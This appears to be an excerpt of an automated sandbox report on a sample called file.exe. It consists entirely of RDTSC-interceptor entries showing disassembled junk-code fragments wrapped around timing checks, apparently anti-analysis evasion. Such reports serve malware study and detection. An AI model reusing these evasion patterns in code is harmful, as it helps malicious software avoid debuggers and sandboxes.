                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75EA5E second address: 75EA64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766B1D second address: 766B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FCA94C93E36h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766B2A second address: 766B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FCA94618476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70E260 second address: 70E2AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA94C93E3Dh 0x0000000b jmp 00007FCA94C93E40h 0x00000010 popad 0x00000011 js 00007FCA94C93E62h 0x00000017 push edi 0x00000018 jg 00007FCA94C93E36h 0x0000001e jmp 00007FCA94C93E46h 0x00000023 pop edi 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769FFD second address: 76A008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCA94618466h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A1B2 second address: 76A1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCA94C93E36h 0x0000000a jmp 00007FCA94C93E49h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A1DC second address: 76A1E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A360 second address: 76A365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A4E9 second address: 76A4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A4EF second address: 76A500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 ja 00007FCA94C93E3Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A500 second address: 76A51F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Eh 0x00000007 push edx 0x00000008 jnc 00007FCA94618466h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A51F second address: 76A523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76A523 second address: 76A527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771F3F second address: 771F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771F43 second address: 771F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FCA9461846Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771F60 second address: 771F70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77204D second address: 772052 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772052 second address: 772076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA94C93E47h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772076 second address: 772093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FCA94618466h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772093 second address: 7720A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7720A3 second address: 7720A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7720A7 second address: 7720AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7720AB second address: 7720D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FCA94618473h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jo 00007FCA94618470h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77582D second address: 77584A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCA94C93E44h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775FBE second address: 775FC3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776127 second address: 77612B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776391 second address: 776395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776395 second address: 7763AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FCA94C93E38h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE24 second address: 77BE33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BE33 second address: 77BE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FCA94C93E3Fh 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f jo 00007FCA94C93E83h 0x00000015 pushad 0x00000016 jc 00007FCA94C93E36h 0x0000001c jno 00007FCA94C93E36h 0x00000022 jmp 00007FCA94C93E3Dh 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FCA94C93E46h 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705C5F second address: 705C64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705C64 second address: 705C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnp 00007FCA94C93E36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 705C72 second address: 705C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007FCA94618466h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEDF second address: 77AEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEE7 second address: 77AEEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEEB second address: 77AEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEF4 second address: 77AEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77AEFF second address: 77AF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B2DC second address: 77B2E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B2E2 second address: 77B2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B2E8 second address: 77B2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A987 second address: 77A990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B5B7 second address: 77B5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B5BB second address: 77B5C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007FCA94C93E36h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BB5B second address: 77BB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BB65 second address: 77BB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FCA94C93E36h 0x0000000a jbe 00007FCA94C93E36h 0x00000010 jp 00007FCA94C93E36h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77BB7F second address: 77BB92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA9461846Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78431C second address: 784323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70272C second address: 702730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702730 second address: 702734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 702734 second address: 70273A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70273A second address: 70274A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jo 00007FCA94C93E36h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70274A second address: 702754 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78318C second address: 783196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FCA94C93E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783196 second address: 7831A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FCA94618466h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7831A6 second address: 7831AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783587 second address: 78358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78358D second address: 7835A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007FCA94C93E42h 0x0000000b jo 00007FCA94C93E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783854 second address: 78386B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCA9461846Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D6BD second address: 72D6C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7841A2 second address: 7841A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7841A6 second address: 7841B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FCA94C93E3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782BC6 second address: 782BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782BCB second address: 782BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78713A second address: 787154 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618472h 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B57F second address: 78B58E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3D2 second address: 78A3DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A3DA second address: 78A3E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459ED second address: 72CB58 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 and cx, BE19h 0x0000000e call dword ptr [ebp+122D57EEh] 0x00000014 jmp 00007FCA9461846Ch 0x00000019 push esi 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745A92 second address: 745A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745E24 second address: 745E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCA94618476h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745E47 second address: 745E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCA94C93E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74623D second address: 746252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FCA9461846Fh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7463E3 second address: 746444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FCA94C93E4Ch 0x0000000b popad 0x0000000c nop 0x0000000d mov edx, dword ptr [ebp+122D394Ch] 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FCA94C93E38h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f pushad 0x00000030 add edx, dword ptr [ebp+122D19F9h] 0x00000036 mov di, AD06h 0x0000003a popad 0x0000003b nop 0x0000003c push edi 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7467A5 second address: 7467AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7467AA second address: 7467FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FCA94C93E38h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, ecx 0x00000026 sub dword ptr [ebp+122D57A7h], ebx 0x0000002c push 0000001Eh 0x0000002e mov edi, esi 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FCA94C93E49h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74693F second address: 746943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746943 second address: 746949 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746B76 second address: 746C17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FCA94618474h 0x0000000c jmp 00007FCA9461846Eh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007FCA94618478h 0x0000001a lea eax, dword ptr [ebp+124776F4h] 0x00000020 and cl, FFFFFFE0h 0x00000023 push eax 0x00000024 pushad 0x00000025 jmp 00007FCA9461846Ah 0x0000002a push ebx 0x0000002b jmp 00007FCA9461846Dh 0x00000030 pop ebx 0x00000031 popad 0x00000032 mov dword ptr [esp], eax 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007FCA94618468h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jmp 00007FCA94618472h 0x00000054 lea eax, dword ptr [ebp+124776B0h] 0x0000005a movsx ecx, si 0x0000005d push eax 0x0000005e push ecx 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746C17 second address: 72D6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FCA94C93E38h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 xor dword ptr [ebp+122D17BCh], ebx 0x00000029 call dword ptr [ebp+122D1B32h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FCA94C93E45h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A87C second address: 78A893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94618473h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A893 second address: 78A89B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78ABD2 second address: 78ABD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78ABD9 second address: 78ABE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FCA94C93E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B14E second address: 78B158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B158 second address: 78B170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E44h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F296 second address: 78F2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FCA94618466h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F2A0 second address: 78F2A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EE34 second address: 78EE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EE47 second address: 78EE51 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EF7F second address: 78EFBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCA94618479h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EFBA second address: 78EFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
